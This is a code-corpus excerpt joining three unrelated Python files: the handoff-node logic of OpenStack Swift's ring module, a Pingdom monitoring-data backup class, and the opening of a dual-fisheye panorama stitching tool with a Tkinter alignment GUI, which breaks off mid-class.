zones.add((dev['region'], dev['zone']))
ips.add((dev['region'], dev['zone'], dev['ip']))
self._num_devs += 1
self._num_regions = len(regions)
self._num_zones = len(zones)
self._num_ips = len(ips)
def _rebuild_tier_data(self):
self.tier2devs = defaultdict(list)
for dev in self._devs:
if not dev:
continue
for tier in tiers_for_dev(dev):
self.tier2devs[tier].append(dev)
tiers_by_length = defaultdict(list)
for tier in self.tier2devs:
tiers_by_length[len(tier)].append(tier)
self.tiers_by_length = sorted(tiers_by_length.values(),
key=lambda x: len(x[0]))
for tiers in self.tiers_by_length:
tiers.sort()
@property
def replica_count(self):
"""Number of replicas (full or partial) used in the ring."""
return len(self._replica2part2dev_id)
@property
def partition_count(self):
"""Number of partitions in the ring."""
return len(self._replica2part2dev_id[0])
@property
def devs(self):
"""devices in the ring"""
if time() > self._rtime:
self._reload()
return self._devs
def has_changed(self):
"""
Check to see if the ring on disk is different than the current one in
memory.
:returns: True if the ring on disk has changed, False otherwise
"""
return getmtime(self.serialized_path) != self._mtime
def _get_part_nodes(self, part):
part_nodes = []
seen_ids = set()
for r2p2d in self._replica2part2dev_id:
if part < len(r2p2d):
dev_id = r2p2d[part]
if dev_id not in seen_ids:
part_nodes.append(self.devs[dev_id])
seen_ids.add(dev_id)
return [dict(node, index=i) for i, node in enumerate(part_nodes)]
def get_part(self, account, container=None, obj=None):
"""
Get the partition for an account/container/object.
:param account: account name
:param container: container name
:param obj: object name
:returns: the partition number
"""
key = hash_path(account, container, obj, raw_digest=True)
if time() > self._rtime:
self._reload()
part = struct.unpack_from('>I', key)[0] >> self._part_shift
return part
def get_part_nodes(self, part):
"""
Get the nodes that are responsible for the partition. If one
node is responsible for more than one replica of the same
partition, it will only appear in the output once.
:param part: partition to get nodes for
:returns: list of node dicts
See :func:`get_nodes` for a description of the node dicts.
"""
if time() > self._rtime:
self._reload()
return self._get_part_nodes(part)
def get_nodes(self, account, container=None, obj=None):
"""
Get the partition and nodes for an account/container/object.
If a node is responsible for more than one replica, it will
only appear in the output once.
:param account: account name
:param container: container name
:param obj: object name
:returns: a tuple of (partition, list of node dicts)
Each node dict will have at least the following keys:
====== ===============================================================
id unique integer identifier amongst devices
index offset into the primary node list for the partition
weight a float of the relative weight of this device as compared to
others; this indicates how many partitions the builder will try
to assign to this device
zone integer indicating which zone the device is in; a given
partition will not be assigned to multiple devices within the
same zone
ip the ip address of the device
port the tcp port of the device
device the device's name on disk (sdb1, for example)
meta general use 'extra' field; for example: the online date, the
hardware description
====== ===============================================================
"""
part = self.get_part(account, container, obj)
return part, self._get_part_nodes(part)
def get_more_nodes(self, part):
"""
Generator to get extra nodes for a partition for hinted handoff.
The handoff nodes will try to be in zones other than the
primary zones, will take into account the device weights, and
will usually keep the same sequences of handoffs even with
ring changes.
:param part: partition to get handoff nodes for
:returns: generator of node dicts
See :func:`get_nodes` for a description of the node dicts.
"""
if time() > self._rtime:
self._reload()
primary_nodes = self._get_part_nodes(part)
used = set(d['id'] for d in primary_nodes)
same_regions = set(d['region'] for d in primary_nodes)
same_zones = set((d['region'], d['zone']) for d in primary_nodes)
same_ips = set(
(d['region'], d['zone'], d['ip']) for d in primary_nodes)
parts = len(self._replica2part2dev_id[0])
start = struct.unpack_from(
'>I', md5(str(part)).digest())[0] >> self._part_shift
inc = int(parts / 65536) or 1
# Multiple loops for execution speed; the checks and bookkeeping get
# simpler as you go along
hit_all_regions = len(same_regions) == self._num_regions
for handoff_part in chain(range(start, parts, inc),
range(inc - ((parts - start) % inc),
start, inc)):
if hit_all_regions:
# At this point, there are no regions left untouched, so we
# can stop looking.
break
for part2dev_id in self._replica2part2dev_id:
if handoff_part < len(part2dev_id):
dev_id = part2dev_id[handoff_part]
dev = self._devs[dev_id]
region = dev['region']
if dev_id not in used and region not in same_regions:
yield dev
used.add(dev_id)
same_regions.add(region)
zone = dev['zone']
ip = (region, zone, dev['ip'])
same_zones.add((region, zone))
same_ips.add(ip)
if len(same_regions) == self._num_regions:
hit_all_regions = True
break
hit_all_zones = len(same_zones) == self._num_zones
for handoff_part in chain(range(start, parts, inc),
range(inc - ((parts - start) % inc),
start, inc)):
if hit_all_zones:
# Much like we stopped looking for fresh regions before, we
# can now stop looking for fresh zones; there are no more.
break
for part2dev_id in self._replica2part2dev_id:
if handoff_part < len(part2dev_id):
dev_id = part2dev_id[handoff_part]
dev = self._devs[dev_id]
zone = (dev['region'], dev['zone'])
if dev_id not in used and zone not in same_zones:
yield dev
used.add(dev_id)
same_zones.add(zone)
ip = zone + (dev['ip'],)
same_ips.add(ip)
if len(same_zones) == self._num_zones:
hit_all_zones = True
break
hit_all_ips = len(same_ips) == self._num_ips
for handoff_part in chain(range(start, parts, inc),
range(inc - ((parts - start) % inc),
start, inc)):
if hit_all_ips:
# We've exhausted the pool of unused backends, so stop
# looking.
break
for part2dev_id in self._replica2part2dev_id:
if handoff_part < len(part2dev_id):
dev_id = part2dev_id[handoff_part]
dev = self._devs[dev_id]
ip = (dev['region'], dev['zone'], dev['ip'])
if dev_id not in used and ip not in same_ips:
yield dev
used.add(dev_id)
same_ips.add(ip)
if len(same_ips) == self._num_ips:
hit_all_ips = True
break
hit_all_devs = len(used) == self._num_devs
for handoff_part in chain(range(start, parts, inc),
range(inc - ((parts - start) % inc),
start, inc)):
if hit_all_devs:
# We've used every device we have, so let's stop looking for
# unused devices now.
break
for part2dev_id in self._replica2part2dev_id:
if handoff_part < len(part2dev_id):
dev_id = part2dev_id[handoff_part]
if dev_id not in used:
yield self._devs[dev_id]
used.add(dev_id)
if len(used) == self._num_devs:
hit_all_devs = True
break
| mjzmjz/swift | swift/common/ring/ring.py | Python | apache-2.0 | 18,195 |
from calendar import timegm
from datetime import datetime, timedelta
from .Pingdom import Pingdom
from .Database import Database
from .log import log
class PingdomBackup:
MAX_INTERVAL = 2764800
def __init__(self, email, password, app_key, database):
self.pingdom = Pingdom(email, password, app_key)
self.database = Database(database)
def update_probes(self):
# get the probe list
log.info('Updating probe records.')
resp_json = self.pingdom.api('GET', 'probes', params={'includedeleted': True})
probes = resp_json['probes']
for probe in probes:
self.database.upsert_record('probes', probe)
log.info('{0} {1} updated.'.format(len(probes), 'probe was' if len(probes) == 1 else 'probes were'))
def update_checks(self):
# get the checks list
log.info('Updating check records.')
resp_json = self.pingdom.api('GET', 'checks')
checks = resp_json['checks']
for check in checks:
del check['tags']
self.database.upsert_record('checks', check)
log.info('{0} {1} updated.'.format(len(checks), 'check was' if len(checks) == 1 else 'checks were'))
def get_check_by_name(self, name):
return self.database.get_record('checks', where='name = ?', parameters=(name, ))
def update_results(self, check):
log.info('Checking for new results.')
# get the most recent result time from the database
results = self.database.get_records('results', order_by='time DESC', limit=1)
if len(results) == 0:
min_from_t = 0
else:
# + 1 because we don't want to include the previous result
min_from_t = results[0]['time'] + 1
to_t = timegm((datetime.now() + timedelta(days=2)).timetuple())
limit = 1000
last_count = limit
all_results = []
while last_count == limit:
# calculate the minimum bound
from_t = max(to_t - self.MAX_INTERVAL, min_from_t)
# get the next page
resp_json = self.pingdom.api('GET', 'results/{0}'.format(check['id']), params={
'to': to_t,
'from': from_t,
'limit': limit
})
results = resp_json['results']
last_count = len(results)
# inspect each row
for result in results:
result['id'] = None
result['checkid'] = check['id']
# update the to_timestamp
if result['time'] < to_t:
to_t = result['time']
all_results.extend(results)
# bulk insert
all_results = sorted(all_results, key=lambda r: r['time'])
log.info('{0} new {1} been found.'.format(len(all_results), 'result has' if len(all_results) == 1 else 'results have'))
self.database.insert_records('results', all_results)
| joelverhagen/PingdomBackup | pingdombackup/PingdomBackup.py | Python | mit | 2,948 |
# -*- coding: utf-8 -*-
# Dual-fisheye to 360-photo conversion tool
# Supports equirectangular and cubemap output formats
#
# Usage instructions:
# python fisheye.py'
# Start interactive alignment GUI.
# python fisheye.py -help
# Print this help message.
# python fisheye.py lens.cfg in1.jpg in2.jpg gui
# Launch interactive GUI with specified default options
# python fisheye.py lens.cfg in1.jpg in2.jpg rect=out.png
# Render and save equirectangular panorama using specified
# lens configuration and source images.'
# python fisheye.py lens.cfg in1.jpg in2.jpg cube=out.png
# Render and save cubemap panorama using specified
# lens configuration and source images.
#
# Copyright (c) 2016 Alexander C. Utter
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import json
import numpy as np
import Tkinter as tk
import tkFileDialog
import tkMessageBox
import sys
import traceback
from copy import deepcopy
from math import pi
from PIL import Image, ImageTk
from scipy.optimize import minimize
from threading import Thread
# Create rotation matrix from an arbitrary quaternion. See also:
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation#Conversion_to_and_from_the_matrix_representation
def get_rotation_matrix(qq):
# Normalize matrix and extract individual items.
qq_norm = np.sqrt(np.sum(np.square(qq)))
w = qq[0] / qq_norm
x = qq[1] / qq_norm
y = qq[2] / qq_norm
z = qq[3] / qq_norm
# Convert to rotation matrix.
return np.matrix([[w*w+x*x-y*y-z*z, 2*x*y-2*w*z, 2*x*z+2*w*y],
[2*x*y+2*w*z, w*w-x*x+y*y-z*z, 2*y*z-2*w*x],
[2*x*z-2*w*y, 2*y*z+2*w*x, w*w-x*x-y*y+z*z]], dtype='float32')
# Conjugate a quaternion to apply the opposite rotation.
def conj_qq(qq):
return np.array([qq[0], -qq[1], -qq[2], -qq[3]])
# Multiply two quaternions:ab = (a0b0 - av dot bv; a0*bv + b0av + av cross bv)
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation#Conversion_to_and_from_the_matrix_representation
def mul_qq(qa, qb):
return np.array([qa[0]*qb[0] - qa[1]*qb[1] - qa[2]*qb[2] - qa[3]*qb[3],
qa[0]*qb[1] + qa[1]*qb[0] + qa[2]*qb[3] - qa[3]*qb[2],
qa[0]*qb[2] + qa[2]*qb[0] + qa[3]*qb[1] - qa[1]*qb[3],
qa[0]*qb[3] + qa[3]*qb[0] + qa[1]*qb[2] - qa[2]*qb[1]])
# Generate a normalized quaternion [W,X,Y,Z] from [X,Y,Z]
def norm_qq(x, y, z):
rsq = x**2 + y**2 + z**2
if rsq < 1:
w = np.sqrt(1-rsq)
return [w, x, y, z]
else:
r = np.sqrt(rsq)
return [0, x/r, y/r, z/r]
# Return length of every column in an MxN matrix.
def matrix_len(x):
#return np.sqrt(np.sum(np.square(x), axis=0))
return np.linalg.norm(x, axis=0)
# Normalize an MxN matrix such that all N columns have unit length.
def matrix_norm(x):
return x / (matrix_len(x) + 1e-9)
# Parameters for a fisheye lens, including its orientation.
class FisheyeLens:
def __init__(self, rows=1024, cols=1024):
# Fisheye lens parameters.
self.fov_deg = 180
self.radius_px = min(rows,cols) / 2
# Pixel coordinates of the optical axis (X,Y).
self.center_px = np.matrix([[cols/2], [rows/2]])
# Quaternion mapping intended to actual optical axis.
self.center_qq = [1, 0, 0, 0]
def downsample(self, dsamp):
self.radius_px /= dsamp
self.center_px /= dsamp
def get_x(self):
return np.asscalar(self.center_px[0])
def get_y(self):
return np.asscalar(self.center_px[1])
def to_dict(self):
return {'cx':self.get_x(),
'cy':self.get_y(),
'cr':self.radius_px,
'cf':self.fov_deg,
'qw':self.center_qq[0],
'qx':self.center_qq[1],
'qy':self.center_qq[2],
'qz':self.center_qq[3]}
def from_dict(self, data):
self.center_px[0] = data['cx']
self.center_px[1] = data['cy']
self.radius_px = data['cr']
self.fov_deg = data['cf']
self.center_qq[0] = data['qw']
self.center_qq[1] = data['qx']
self.center_qq[2] = data['qy']
self.center_qq[3] = data['qz']
# Load or save lens configuration and alignment.
def load_config(file_obj, lens1, lens2):
[data1, data2] = json.load(file_obj)
lens1.from_dict(data1)
lens2.from_dict(data2)
def save_config(file_obj, lens1, lens2):
data = [lens1.to_dict(), lens2.to_dict()]
json.dump(data, file_obj, indent=2, sort_keys=True)
# Fisheye source image, with lens and rotation parameters.
# Contains functions for extracting pixel data given direction vectors.
class FisheyeImage:
# Load image file and set default parameters
def __init__(self, src_file, lens=None):
# Load the image file, and convert to a numpy matrix.
self._update_img(Image.open(src_file))
# Set lens parameters.
if lens is None:
self.lens = FisheyeLens(self.rows, self.cols)
else:
self.lens = lens
# Update image matrix and corresponding size variables.
def _update_img(self, img):
self.img = np.array(img)
self.rows = self.img.shape[0]
self.cols = self.img.shape[1]
self.clrs = self.img.shape[2]
# Shrink source image and adjust lens accordingly.
def downsample(self, dsamp):
# Adjust lens parameters.
self.lens.downsample(dsamp)
# Determine the new image dimensions.
# Note: PIL uses cols, rows whereas numpy uses rows, cols
shape = (self.img.shape[1] / dsamp, # Cols
self.img.shape[0] / dsamp) # Rows
# Convert matrix back to PIL Image and resample.
img = Image.fromarray(self.img)
img.thumbnail(shape, Image.BICUBIC)
# Convert back and update size.
self._update_img(img)
# Given an 3xN array of "XYZ" vectors in panorama space (+X = Front),
# convert each ray to 2xN coordinates in "UV" fisheye image space.
def get_uv(self, xyz_vec):
# Extract lens parameters of interest.
fov_rad = self.lens.fov_deg * pi / 180
fov_scale = np.float32(2 * self.lens.radius_px / fov_rad)
# Normalize the input vector and rotate to match lens reference axes.
xyz_rot = get_rotation_matrix(self.lens.center_qq) * matrix_norm(xyz_vec)
# Convert to polar coordinates relative to lens boresight.
# (In lens coordinates, unit vector's X axis gives boresight angle;
# normalize Y/Z to get a planar unit vector for the bearing.)
# Note: Image +Y maps to 3D +Y, and image +X maps to 3D +Z.
theta_rad = np.arccos(xyz_rot[0,:])
proj_vec = matrix_norm(np.concatenate((xyz_rot[2,:], xyz_rot[1,:])))
# Fisheye lens maps 3D angle to focal-plane radius.
# TODO: Do we need a better model for lens distortion?
rad_px = theta_rad * fov_scale
# Convert back to focal-plane rectangular coordinates.
uv = np.multiply(rad_px, proj_vec) + self.lens.center_px
return np.asarray(uv + 0.5, dtype=int)
# Given an 2xN array of UV pixel coordinates, check if each pixel is
# within the fisheye field of view. Returns N-element boolean mask.
def get_mask(self, uv_px):
# Check whether each coordinate is within outer image bounds,
# and within the illuminated area under the fisheye lens.
x_mask = np.logical_and(0 <= uv_px[0], uv_px[0] < self.cols)
y_mask = np.logical_and(0 <= uv_px[1], uv_px[1] < self.rows)
# Check whether each coordinate is within the illuminated area.
r_mask = matrix_len(uv_px - self.lens.center_px) < self.lens.radius_px
# All three checks must pass to be considered visible.
all_mask = np.logical_and(r_mask, np.logical_and(x_mask, y_mask))
return np.squeeze(np.asarray(all_mask))
# Given an 2xN array of UV pixel coordinates, return a weight score
# that is proportional to the distance from the edge.
def get_weight(self, uv_px):
mm = self.get_mask(uv_px)
rr = self.lens.radius_px - matrix_len(uv_px - self.lens.center_px)
rr[~mm] = 0
return rr
# Given a 2xN array of UV pixel coordinates, return the value of each
# corresponding pixel. Output format is Nx1 (grayscale) or Nx3 (color).
# Pixels outside the fisheye's field of view are pure black (0) or (0,0,0).
def get_pixels(self, uv_px):
# Create output array with default pixel values.
pcount = uv_px.shape[1]
result = np.zeros((pcount, self.clrs), dtype=self.img.dtype)
# Overwrite in-bounds pixels as specified above.
self.add_pixels(uv_px, result)
return result
# Given a 2xN array of UV pixel coordinates, write the value of each
# corresponding pixel to the linearized input/output image (Nx3).
# Several weighting modes are available.
def add_pixels(self, uv_px, img1d, weight=None):
# Lookup row & column for each in-bounds coordinate.
mask = self.get_mask(uv_px)
xx = uv_px[0,mask]
yy = uv_px[1,mask]
# Update matrix according to assigned weight.
if weight is None:
img1d[mask] = self.img[yy,xx]
elif np.isscalar(weight):
img1d[mask] += self.img[yy,xx] * weight
else:
w1 = np.asmatrix(weight, dtype='float32')
w3 = w1.transpose() * np.ones((1,3))
img1d[mask] += np.multiply(self.img[yy,xx], w3[mask])
# A panorama image made from several FisheyeImage sources.
# TODO: Add support for supersampled anti-aliasing filters.
class PanoramaImage:
def __init__(self, src_list):
self.debug = True
self.sources = src_list
self.dtype = self.sources[0].img.dtype
self.clrs = self.sources[0].clrs
# Downsample each source image.
def downsample(self, dsamp):
for src in self.sources:
src.downsample(dsamp)
# Return a list of 'mode' strings suitable for render_xx() methods.
def get_render_modes(self):
return ['overwrite', 'align', 'blend']
# Retrieve a scaled copy of lens parameters for the Nth source.
def scale_lens(self, idx, scale=None):
temp = deepcopy(self.sources[idx].lens)
temp.downsample(1.0 / scale)
return temp
# Using current settings as an initial guess, use an iterative optimizer
# to better align the source images. Adjusts FOV of each lens, as well
# as the rotation quaternions for all lenses except the first.
# TODO: Implement a higher-order loop that iterates this step with
# progressively higher resolution. (See also: create_panorama)
# TODO: Find a better scoring heuristic. Present solution always
# converges on either FOV=0 or FOV=9999, depending on wt_pixel.
def optimize(self, psize=256, wt_pixel=1000, wt_blank=1000):
# Precalculate raster-order XYZ coordinates at given resolution.
[xyz, rows, cols] = self._get_equirectangular_raster(psize)
# Scoring function gives bonus points per overlapping pixel.
score = lambda svec: self._score(svec, xyz, wt_pixel, wt_blank)
# Multivariable optimization using gradient-descent or similar.
# https://docs.scipy.org/doc/scipy/reference/tutorial/optimize.html
svec0 = self._get_state_vector()
final = minimize(score, svec0, method='Nelder-Mead',
options={'xtol':1e-4, 'disp':True})
# Store final lens parameters.
self._set_state_vector(final.x)
# Render combined panorama in equirectangular projection mode.
# See also: https://en.wikipedia.org/wiki/Equirectangular_projection
def render_equirectangular(self, out_size, mode='blend'):
# Render the entire output in a single pass.
[xyz, rows, cols] = self._get_equirectangular_raster(out_size)
return Image.fromarray(self._render(xyz, rows, cols, mode))
# Render combined panorama in cubemap projection mode.
# See also: https://en.wikipedia.org/wiki/Cube_mapping
def render_cubemap(self, out_size, mode='blend'):
# Create coordinate arrays.
cvec = np.arange(out_size, dtype='float32') - out_size/2 # Coordinate range [-S/2, S/2)
vec0 = np.ones(out_size*out_size, dtype='float32') * out_size/2 # Constant vector +S/2
vec1 = np.repeat(cvec, out_size) # Increment every N steps
vec2 = np.tile(cvec, out_size) # Sweep N times
# Create XYZ coordinate vectors and render each cubemap face.
render = lambda(xyz): self._render(xyz, out_size, out_size, mode)
xm = render(np.matrix([-vec0, vec1, vec2])) # -X face
xp = render(np.matrix([vec0, vec1, -vec2])) # +X face
ym = render(np.matrix([-vec1, -vec0, vec2])) # -Y face
yp = render(np.matrix([vec1, vec0, vec2])) # +Y face
zm = render(np.matrix([-vec2, vec1, -vec0])) # -Z face
zp = render(np.matrix([vec2, vec1, vec0])) # +Z face
# Concatenate the individual faces in canonical order:
# https://en.wikipedia.org/wiki/Cube_mapping#Memory_Addressing
img_mat = np.concatenate([zp, zm, ym, yp, xm, xp], axis=0)
return Image.fromarray(img_mat)
# Get XYZ vectors for an equirectangular render, in raster order.
# (Each row left to right, with rows concatenates from top to bottom.)
def _get_equirectangular_raster(self, out_size):
# Set image size (2x1 aspect ratio)
rows = out_size
cols = 2*out_size
# Calculate longitude of each column.
theta_x = np.linspace(-pi, pi, cols, endpoint=False, dtype='float32')
cos_x = np.cos(theta_x).reshape(1,cols)
sin_x = np.sin(theta_x).reshape(1,cols)
# Calculate lattitude of each row.
ystep = pi / rows
theta_y = np.linspace(-pi/2 + ystep/2, pi/2 - ystep/2, rows, dtype='float32')
cos_y = np.cos(theta_y).reshape(rows,1)
sin_y = np.sin(theta_y).reshape(rows,1)
# Calculate X, Y, and Z coordinates for each output pixel.
x = cos_y * cos_x
y = sin_y * np.ones((1,cols), dtype='float32')
z = cos_y * sin_x
# Vectorize the coordinates in raster order.
xyz = np.matrix([x.ravel(), y.ravel(), z.ravel()])
return [xyz, rows, cols]
# Convert all lens parameters to a state vector. See also: optimize()
def _get_state_vector(self):
nsrc = len(self.sources)
assert nsrc > 0
svec = np.zeros(4*nsrc - 3)
# First lens: Only the FOV is stored.
svec[0] = self.sources[0].lens.fov_deg - 180
# All other lenses: Store FOV and quaternion parameters.
for n in range(1, nsrc):
svec[4*n-3] = self.sources[n].lens.fov_deg - 180
svec[4*n-2] = self.sources[n].lens.center_qq[1]
svec[4*n-1] = self.sources[n].lens.center_qq[2]
svec[4*n-0] = self.sources[n].lens.center_qq[3]
return svec
# Update lens parameters based on state vector. See also: optimize()
def _set_state_vector(self, svec):
# Sanity check on input vector.
nsrc = len(self.sources)
assert len(svec) == (4*nsrc - 3)
# First lens: Only the FOV is changed.
self.sources[0].lens.fov_deg = svec[0] + 180
# All other lenses: Update FOV and quaternion parameters.
for n in range(1, nsrc):
self.sources[n].lens.fov_deg = svec[4*n-3] + 180
self.sources[n].lens.center_qq[1] = svec[4*n-2]
self.sources[n].lens.center_qq[2] = svec[4*n-1]
self.sources[n].lens.center_qq[3] = svec[4*n-0]
# Add pixels from every source to form a complete output image.
# Several blending modes are available. See also: get_render_modes()
def _render(self, xyz, rows, cols, mode):
# Allocate Nx3 or Nx1 "1D" pixel-list (raster-order).
img1d = np.zeros((rows*cols, self.clrs), dtype='float32')
# Determine rendering mode:
if mode == 'overwrite':
# Simplest mode: Draw first, then blindly overwrite second.
for src in self.sources:
uv = src.get_uv(xyz)
src.add_pixels(uv, img1d)
elif mode == 'align':
# Alignment mode: Draw each one at 50% intensity.
for src in self.sources:
uv = src.get_uv(xyz)
src.add_pixels(uv, img1d, 0.5)
elif mode == 'blend':
# Linear nearest-source blending.
uv_list = []
wt_list = []
wt_total = np.zeros(rows*cols, dtype='float32')
# Calculate per-image and total weight matrices.
for src in self.sources:
uv = src.get_uv(xyz)
wt = src.get_weight(uv)
uv_list.append(uv)
wt_list.append(wt)
wt_total += wt
# Render overall image using calculated weights.
for n in range(len(self.sources)):
wt_norm = wt_list[n] / wt_total
self.sources[n].add_pixels(uv_list[n], img1d, wt_norm)
else:
raise ValueError('Invalid render mode.')
# Convert to fixed-point image matrix and return.
img2d = np.reshape(img1d, (rows, cols, self.clrs))
return np.asarray(img2d, dtype=self.dtype)
# Compute a normalized alignment score, based on size of overlap and
# the pixel-differences in that region. Note: Lower = Better.
def _score(self, svec, xyz, wt_pixel, wt_blank):
# Update lens parameters from state vector.
self._set_state_vector(svec)
# Determine masks for each input image.
uv0 = self.sources[0].get_uv(xyz)
uv1 = self.sources[1].get_uv(xyz)
wt0 = self.sources[0].get_weight(uv0) > 0
wt1 = self.sources[1].get_weight(uv1) > 0
# Count overlapping pixels.
ovr_mask = np.logical_and(wt0, wt1) # Overlapping pixel
pix_count = np.sum(wt0) + np.sum(wt1) # Total drawn pixels
blk_count = np.sum(np.logical_and(~wt0, ~wt1)) # Number of blank pixels
# Allocate Nx3 or Nx1 "1D" pixel-list (raster-order).
pcount = max(xyz.shape)
img1d = np.zeros((pcount, self.clrs), dtype='float32')
# Render the difference image, overlapping region only.
self.sources[0].add_pixels(uv0, img1d, 1.0*ovr_mask)
self.sources[1].add_pixels(uv1, img1d, -1.0*ovr_mask)
# Sum-of-differences.
sum_sqd = np.sum(np.sum(np.sum(np.square(img1d))))
# Compute overall score. (Note: Higher = Better)
score = sum_sqd + wt_blank * blk_count - wt_pixel * pix_count
# (Debug) Print status information.
if (self.debug):
print str(svec) + ' --> ' + str(score)
return score
# Tkinter GUI window for loading a fisheye image.
class FisheyeAlignmentGUI:
def __init__(self, parent, src_file, lens):
# Set flag once all window objects created.
self.init_done = False
# Final result is the lens object.
self.lens = lens
# Load the input file.
self.img = Image.open(src_file)
# Create frame for this window with two vertical panels...
parent.wm_title('Fisheye Alignment')
self.frame = tk.Frame(parent)
self.controls = tk.Frame(self.frame)
# Make sliders for adjusting the lens parameters quaternion.
self.x = self._make_slider(self.controls, 0, 'Center-X (px)',
lens.get_x(), self.img.size[0])
self.y = self._make_slider(self.controls, 1, 'Center-Y (px)',
lens.get_y(), self.img.size[1])
self.r = self._make_slider(self.controls, 2, 'Radius (px)',
lens.radius_px, self.img.size[0])
self.f = self._make_slider(self.controls, 3, 'Field of view (deg)',
lens.fov_deg, 240, res=0.1)
# Create a frame for the preview image, which resizes based on the
# outer frame but does not respond to the contained preview size.
self.preview_frm = tk.Frame(self.frame)
self.preview_frm.bind('<Configure>', self._update_callback) # Update on resize
# Create the canvas object for the preview image.
self.preview = tk.Canvas(self.preview_frm)
# Finish frame creation.
self.controls.pack(side=tk.LEFT)
self.preview.pack(fill=tk.BOTH, expand=1)
self.preview_frm.pack(side=tk.LEFT, fill=tk.BOTH, expand=1)
self.frame.pack(fill=tk.BOTH, expand=1)
# Render the image once at default size
self.init_done = True
self.update_preview((800,800))
# Disable further size propagation.
self.preview_frm.update()
self.preview_frm.pack_propagate(0)
# Redraw the preview image using latest GUI parameters.
def update_preview(self, psize):
# Safety check: Ignore calls during construction/destruction.
if not self.init_done: return
# Copy latest user settings to the lens object.
self.lens.fov_deg = self.f.get()
self.lens.radius_px = self.r.get()
self.lens.center_px[0] = self.x.get()
self.lens.center_px[1] = self.y.get()
# Re-scale the image to match the canvas size.
# Note: Make a copy first, because thumbnail() operates in-place.
self.img_sc = self.img.copy()
self.img_sc.thumbnail(psize, Image.NEAREST)
self.img_tk = ImageTk.PhotoImage(self.img_sc)
# Re-scale the x/y/r parameters to match the preview scale.
pre_scale = float(psize[0]) / float(self.img.size[0])
x = self.x.get() * pre_scale
y = self.y.get() * pre_scale
r = self.r.get() * pre_scale
# Clear and redraw the canvas.
self.preview.delete('all')
self.preview.create_image(0, 0, anchor=tk.NW, image=self.img_tk)
self.preview.create_oval(x-r, y-r, x+r, y+r,
outline='#C00000', width=3)
# Make a combined label/textbox/slider for a given variable:
def _make_slider(self, parent, rowidx, label, inival, maxval, res=0.5):
# Create shared variable and set initial value.
tkvar = tk.DoubleVar()
tkvar.set(inival)
# Set a callback for whenever tkvar is changed.
# (The 'command' callback on the SpinBox only applies to the buttons.)
tkvar.trace('w', self._update_callback)
# Create the Label, SpinBox, and Scale objects.
label = tk.Label(parent, text=label)
spbox = tk.Spinbox(parent,
textvariable=tkvar,
from_=0, to=maxval, increment=res)
slide = tk.Scale(parent,
orient=tk.HORIZONTAL,
showvalue=0,
variable=tkvar,
from_=0, to=maxval, resolution=res)
label.grid(row=rowidx, column=0)
spbox.grid(row=rowidx, column=1)
slide.grid(row=rowidx, column=2)
return tkvar
# Find the largest output size that fits within the given bounds and
# matches the aspect ratio of the original source image.
def _get_aspect_size(self, max_size):
img_ratio = float(self.img.size[1]) / float(self.img.size[0])
return (min(max_size[0], max_size[1] / img_ratio),
min(max_size[1], max_size[0] * img_ratio))
# Thin wrapper for update_preview(), used to strip Tkinter arguments.
def _update_callback(self, *args):
# Sanity check that initialization is completed:
if not self.init_done: return
# Determine the render size. (Always 2:1 aspect ratio.)
psize = self._get_aspect_size((self.preview_frm.winfo_width(),
self.preview_frm.winfo_height()))
# Render the preview at the given size.
if psize[0] >= 10 and psize[1] >= 10:
self.update_preview(psize)
# Tkinter GUI window for calibrating fisheye alignment.
class PanoramaAlignmentGUI:
def __init__(self, parent, panorama, psize=512):
self.init_done = False
# Store source and preview size
self.panorama = panorama
# Create frame for this window with two vertical panels...
parent.wm_title('Panorama Alignment')
self.frame = tk.Frame(parent)
self.controls = tk.Frame(self.frame)
# Make a drop-menu to select the rendering mode.
tk.Label(self.controls, text='Preview mode').grid(row=0, column=0, sticky=tk.W)
self.mode = tk.StringVar()
self.mode.set('align')
self.mode.trace('w', self._update_callback)
mode_list = self.panorama.get_render_modes()
mode_drop = tk.OptionMenu(self.controls, self.mode, *mode_list)
mode_drop.grid(row=0, column=1, columnspan=2, sticky='NESW')
# Determine which axis marks the main 180 degree rotation.
front_qq = panorama.sources[0].lens.center_qq
back_qq = panorama.sources[1].lens.center_qq
diff_qq = mul_qq(front_qq, back_qq)
# Create the axis selection toggle. (Flip on Y or Z)
self.flip_axis = tk.BooleanVar()
self.flip_axis.trace('w', self._update_callback)
if abs(diff_qq[2]) > abs(diff_qq[3]):
self.flip_axis.set(False)
flip_qq = [0,0,1,0]
else:
self.flip_axis.set(True)
flip_qq = [0,0,0,1]
tk.Label(self.controls, text='Flip axis').grid(row=1, column=0, sticky=tk.W)
axis_chk = tk.Checkbutton(self.controls, variable=self.flip_axis)
axis_chk.grid(row=1, column=1, columnspan=2, sticky='NESW')
# Extract the (hopefully small) alignment offset.
flip_conj = conj_qq(mul_qq(flip_qq, front_qq))
align_qq = mul_qq(back_qq, flip_conj)
# Make three sliders for adjusting the relative alignment.
self.slide_rx = self._make_slider(self.controls, 2, 'Rotate X', front_qq[1])
self.slide_ry = self._make_slider(self.controls, 3, 'Rotate Y', front_qq[2])
self.slide_rz = self._make_slider(self.controls, 4, 'Rotate Z', front_qq[3])
self.slide_ax = self._make_slider(self.controls, 5, 'Align X', align_qq[1])
self.slide_ay = self._make_slider(self.controls, 6, 'Align Y', align_qq[2])
self.slide_az = self._make_slider(self.controls, 7, 'Align Z', align_qq[3])
# Finish control-frame creation.
self.controls.pack(side=tk.LEFT)
# Create a frame for the preview image, which resizes based on the
# outer frame but does not respond to the contained preview size.
self.preview_frm = tk.Frame(self.frame)
self.preview_frm.bind('<Configure>', self._update_callback) # Update on resize
# Add the preview.
